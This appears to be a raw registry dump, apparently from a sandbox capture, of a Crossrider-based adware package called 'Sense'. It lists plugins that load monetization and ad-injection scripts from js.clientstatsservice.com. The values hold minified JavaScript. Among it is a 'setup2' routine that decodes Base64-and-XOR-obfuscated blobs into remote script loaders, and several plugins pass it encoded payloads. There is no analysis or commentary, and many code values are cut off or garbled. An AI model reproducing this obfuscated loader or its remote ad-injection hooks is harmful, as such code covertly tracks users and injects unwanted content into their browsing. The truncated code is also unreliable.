    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b["

    [HKCU\Software\Sense\Plugins\103]
    "Name" = "intext_5_m"

    [HKCU\Software\Sense\Plugins\21]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/debug.js"

    [HKCU\Software\Sense\Plugins\36]
    "Name" = "IEBackground"

    [HKCU\Software\Sense\Plugins\4]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\37]
    "Version" = "6"

    [HKCU\Software\Sense\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\Sense\Plugins\102]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js"

    [HKCU\Software\Sense\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){if(!String.prototype.trim){String.prototype.trim=function(){return this.replace(/^\s |\s $/g,);};}if(!Array.prototype.filter){Array.prototype.filter=function(f){if(!this){throw new TypeError();}var k=Object(this);var e=k.length>>>0;if(typeof f!==function){throw new TypeError();}var j=[];var h=arguments[1];for(var g in k){if(k.hasOwnProperty(g)){if(f.call(h,k[g],g,k)){j.push(k[g]);}}}return j;};}if(!Array.prototype.forEach){Array.prototype.forEach=function c(l,f){var h,g;if(this==null){throw new TypeError(this is null or not defined);}var i,j=Object(this),e=j.length>>>0;if({}.toString.call(l)!==[object Function]){throw new TypeError(l is not a function);}if(arguments.length>=2){h=f;}g=0;while(g
    [HKCU\Software\Sense\Plugins\177]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el["

    [HKCU\Software\Sense\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\Sense\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b1"

    [HKCU\Software\Sense\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\Sense\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se1"

    [HKCU\Software\Sense\Plugins\36]
    "Version" = "8"

    [HKCU\Software\Sense\Plugins\184]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\Sense\Plugins\244]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\Sense\Plugins\239]
    "Name" = "revizer_ws_dynamic_b2b_safe_m"

    [HKCU\Software\Sense\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\Sense\Plugins\22]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources.js"

    [HKCU\Software\Sense\Plugins\242]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKCU\Software\Sense\Plugins\104]
    "Version" = "9"

    [HKCU\Software\Sense\Plugins\35]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\Sense\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE3YjYyNDEwZjFkMWUwMjJkMDIxNjUzNTE0MzQ1MDExZTA2MDg0YTU1NWUwODA3MDk0NzFjMWIwYjExMWUxNTQ1MDAwODA0NDUwMTFiMDIxMzAxMWY0YzU2NWQ1ZjQ0NGY0NzQ4NDQ1YzU1NTI0NjFhMDAxZDFjMTUxMDBmNGQwZDFhNTUwMTBkMTIxMzE1NTYzYzM4MmEzODNkMmIyMzI4MzgyZjI2MzUzNjM5MjczYTJmMzMzNTM0M2M0NTQ1NjA3YjVhMDAxNjA0MGMwYTA5MjAwZTUwNDI1MDQ4NDM1ODRmNmQ0OTRhNTI1ODUyMGMxNDE5MTcwZTBhMGIxZTVhNGE1YTJhNDkxMDBmMDYxYTAyMTExZTFkNTMzNjY5MWE=', 'zqkcgijrxp'); }"

    [HKCU\Software\Sense\Plugins\184]
    "Version" = "9"

    [HKCU\Software\Sense\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke3["

    [HKCU\Software\Sense\Plugins\123]
    "Name" = "intext_adv_m"

    [HKCU\Software\Sense\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\Sense]
    "ActiveAppId" = "48292"

    [HKCU\Software\Sense\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\Sense\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\Sense\Plugins\78]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\Sense\Plugins\2]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_1.js"

    [HKCU\Software\Sense\Plugins\91]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js"

    [HKCU\Software\Sense\Plugins\123]
    "Version" = "9"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Sense\Plugins\72]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\193]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_m.js"
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTM2NTY3NDYwNjE4MTUxOTNkMWMwNDRkNTQ0NDRjMDQxNTFkMTg1NDQ3NDAwZjE3MWMxYTRjMDg0NjBmMDMwZTAzMDUwNzA0MDU0NzA2MGIxYzQwMWQwMDQxNWQ1NjU5NTg0MTU5NWY1YzUwNDAwNjEyNGI0NDY0NjE0ZDA2MTAxYTFjMTIzYzFhMDI0YTU1NGU0NjA2MTgxNTE5MWI1NDQ3NDAwZjE3MWMxYTRjMDg0NjBmMDMwZTAzMDUwNzA0MDU0NzA2MGIxYzQwMWQwMDQxNWQ1NjU5NTg0MTU5NWY1YzUwNDAwNjEyNGI0NDY0NjE0ZDFlMDgxYjBiMDgwNzIxMGE0YTU1NGU1NTU3NWY0ZDYzNDg0ZTQ4NGY0YzEyMGIxZTE1MDAwYjBmMDQ0ZDU0NDQzNTRlMDAwZDFiNGMzNTQzNjQ0NDRlNGM0MTRiMDEwMDA0MDYwMDAxMjQzZjQzNTM0ODRjMWYwNjAwMDAwMTFiNGYzNjFhMTgxMjVlNTk1NDVlMTQ1MDU5NWE1YTQ4NTI0ZTFmNGU0YjExMWMwYTAyMDExYzA2MDExYzMzMTIxYzBhMDcwYzQ4NTQ0NDQ5MzMzZTJhM2EyMTNiM2MzYzJkMmEyOTMzMzYyNDI3MmYyNzNhM2IzZDM5MjMzNjIxMmEzNzMwNDk0NDQ1NGM0NjU5NTg1ZTU4NWY1ZTU0NWU1YzUxNTk0ZjEzNTM0ZDY0MTk=', 'hondnlaihn'); }"

    [HKCU\Software\Sense\Plugins\103]
    "Version" = "8"

    [HKCU\Software\Sense\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\Sense\Plugins\13]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\Sense\Plugins\211]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"

    [HKCU\Software\Sense\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA["

    [HKCU\Software\Sense\Plugins\233]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk3YzY3NTYwZTFiMGQxZTI1MTQwZTU0NTQ1NDQ0MDcwZDFhMDA1YzRkNTkwZjA3MTQxOTU0MGY1ZTA3MDkxNzAzMTUwZjA3MWQ0MDFlMDMxNjU5MWQxMDQ5NWU0ZTVlNDA0OTUzNDY1YjQ0NDgwNTBhNGM1YzZjNmI1NDA2MDAxMjFmMGEzYjAyMGE0MDRjNGU1NjBlMWIwZDFlMDM1YzRkNTkwZjA3MTQxOTU0MGY1ZTA3MDkxNzAzMTUwZjA3MWQ0MDFlMDMxNjU5MWQxMDQ5NWU0ZTVlNDA0OTUzNDY1YjQ0NDgwNTBhNGM1YzZjNmI1NDFlMTgxMzA4MTAwMDM5MDI0MDRjNGU0NjU1NWM1NTY0NTA0NjQyNTY0YzAyMDMxZDBkMDcxMzA3MGU1NDU0NTQzZDRkMTgwYTAzNDQzZjVhNjQ1NDQ2NGY1OTRjMTkwODBlMWYwMDExMmMzYzViNTQ1MDQ0MTUxZjAwMTAwOTE4NTczMTAyMTAxODQ3NTk0NDU2MTc0ODVlNDU1NjQyNGI0ZTBmNDY0ODA5MWIxMjBhMGIwNTA2MTExNDMwMGExYjEyMGYwNjUxNTQ1NDQxMzAyNjJkMjIyOTMxMjUzYzNkMjIyYTJiMzEzYzJmMjUzZTNhMmIzNTNhM2IzMTM5MjIzZDI5NDk1NDRkNGY1ZTVlNDA1NjUyNDY1ZTQ0NTY1ZjQ5NWU1NzFiNTk1NDY0MDk=', 'bvntfoynpf'); }"

    [HKCU\Software\Sense\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\Sense\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\Sense\Plugins\230]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_2_m.js"

    [HKCU\Software\Sense\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\Sense\Plugins\42]
    "Version" = "9"

    [HKCU\Software\Sense\Plugins\207]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\Sense\Plugins\244]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\155]
    "Name" = "ibario_pops_m"

    [HKCU\Software\Sense\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,123,155,180,184,192,193,211,223,226,230,233,239,242,244,91"

    [HKCU\Software\Sense\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\Sense\Plugins\7]
    "Version" = "2"

    [HKCU\Software\Sense\Manifest]
    "PublisherId" = "20891"

    [HKCU\Software\Sense\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Sense\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\Sense\Plugins\193]
    "Name" = "revizer_p_dynamic_b2b_m"

    [HKCU\Software\Sense\Plugins\180]
    "Version" = "10"

    [HKCU\Software\Sense\Plugins\182]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/openUrl.js"

    [HKCU\Software\Sense\Installer]
    "FullVersion" = "1.34.5.12"

    [HKCU\Software\Sense\Plugins\13]
    "Version" = "7"

    [HKCU\Software\Sense\Manifest]
    "Description" = "."

    [HKCU\Software\Sense\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;["

    [HKCU\Software\Sense\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn["

    [HKCU\Software\Sense\Installer]
    "CodeDownloadDomain" = "http://js.clientstatsservice.com"

    [HKCU\Software\Sense\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\Sense\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttd["

    [HKCU\Software\Sense\Plugins\220]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_base_m.js"

    [HKCU\Software\Sense\Plugins\3]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Sense\Plugins\195]
    "Version" = "25"

    [HKCU\Software\Sense\Plugins\246]
    "JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDER"

    [HKCU\Software\Sense\Plugins\41]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Sense\Plugins\192]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_m.js"

    [HKCU\Software\Sense\Plugins\43]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\239]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_safe_m.js"

    [HKCU\Software\Sense\Plugins\220]
    "Version" = "8"

    [HKCU\Software\Sense\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});贐W"

    [HKCU\Software\Sense\Installer]
    "Time" = "1401908103"

    [HKCU\Software\Sense\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\Sense\Plugins\37]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\Sense\Plugins\40]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\Sense\Plugins\180]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/bpo_serp_m.js"

    [HKCU\Software\Sense\Plugins\244]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU3Zjc4NTUwOTE1MDAwODJkMTAwMjU3NGI1NzQzMDkwMDBjMDg1ODQxNWExNDBmMTU1MDVhMWQxNjA1MGYxMjE0MGUwMDRmMTcxNzE1NGQxOTFjMTUxMDA0MTU1YjExMTYwODBiMTYwNTI4MTIxMTE1MGExMzRkMDcxYjFiMjgxMjExMDYxMzI3MTExYTE0MDMwMzA0MTM1YTEyMGI1ZDFlMWMxNTRhMmQzNTMxMGIzNzI2MmY0NDNlMzMzMDEyMzkxMjFmNTEyMzFmMzgwNDJmMjUxNzRjMzczNjJmNTA0MjMzNDcxMjAxMWExMTA2NTMyYTJlMzQzMzJlMjcyYjJhMmIyYTMwMjMyODMyMzQzNjI3MzEyNjMxMmE1MzViNmI2ODU2MDgxNDE3MDkxYzFmM2UwNTQzNGU1ODRhNTY1YTdmMGM=', 'nuqwaatxxb'); }"

    [HKCU\Software\Sense\Plugins\44]
    "Version" = "6"

    [HKCU\Software\Sense\Plugins\4]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Sense\Plugins\192]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\230]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\36]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\Sense\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\Sense\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Sense\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\Sense\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\Sense\Plugins\14]
    "Version" = "11"

    [HKCU\Software\Sense\Plugins\211]
    "Version" = "5"

    [HKCU\Software\Sense\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\Sense\Plugins\239]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2YjdmNDkwYjBkMWQwNTI0MTAwNzQzNGM0YjQxMTExZDAxMDE1ODQ0NGUxODFiMTA1NzA3MWEwMTEwMDQwMzFhMGUwZTA5MTkxNjVmMDEwNDBjNTkwNTEzMGEwYjVhMWQwZDBjMDgxNTQ1MDkwYTU2M2EwMzBiMGMwODE4MjIwNzQ0MmM0ZDMwNTYyYTUzNDUyYTRlM2I1OTQ2NDU0ZjJlNTM0NzVhNGUzODUwMzQ0MTRmNWI1MTQ3NWU1MjRlMmQ0NDQxMjQ1ZDI0NTAzODBhMGQwYzNjMTU1ZjM4MDAxYTBlMTA1ZjM5MTQwMzE2MDUwNDA0MjIyNzQ0NWI0NTQxNTI1YjQ3MjYxOTBjMWQxYzE2MDUyYzBhMGMxMzU2M2MyNjJhMjczZTMxMzgzMzNmMmYyNjJiMzYzNDIxMzIzNDJmMzcyNjI2MjYzNjUzMjUwZDA0MGQxNDBhMTEzMDBkNDgyZTNkMjgzMzM5MzgzMDJiMjAzMTM0MzAzNDMyMjMyOTNjMzAyZDJhMmU0MDQ3NmI3ZjQ5MGIwZDFkMDUwMjM3MTkwZDU0NTE0MzViMDEwMTA1MTIxODViNTk0NDBkMDkxYTViMWYwZDFiMTMxOTA5MGYxYzA0MDUwMTAxNDUwMjE5MDY0YzE3MTkwNjEzNGQwNzBlMTEwMjAwNTcwMzA2NGUyZDE5MDgxMTAyMGQzMDBkNDgzNDVhMmE1NTM3NTk1MDM4NDQzNzQxNTE1ZjRjMzM1OTUyNDg0NDM0NDgyMzViNGM0NjViNTI0YzU4NDIzNTUzNWIyNzQwMmU0NTJhMDAwMTE0MmIwZjVjMjUwYTBmMWMxYTUzMjEwMzE5MTUxODBlMTEzMDJkNDg0MzUyNWI1MTQ2NGQzMzBiMDYxMTA0MDExZjJmMTcwNjA2NDQzNjJhMzIzMDI0MzIyNTM5MmEzZDJjMjcyZTIzM2IzMTI5MjUyMjM0MmM\["

    [HKCU\Software\Sense\Plugins\91]
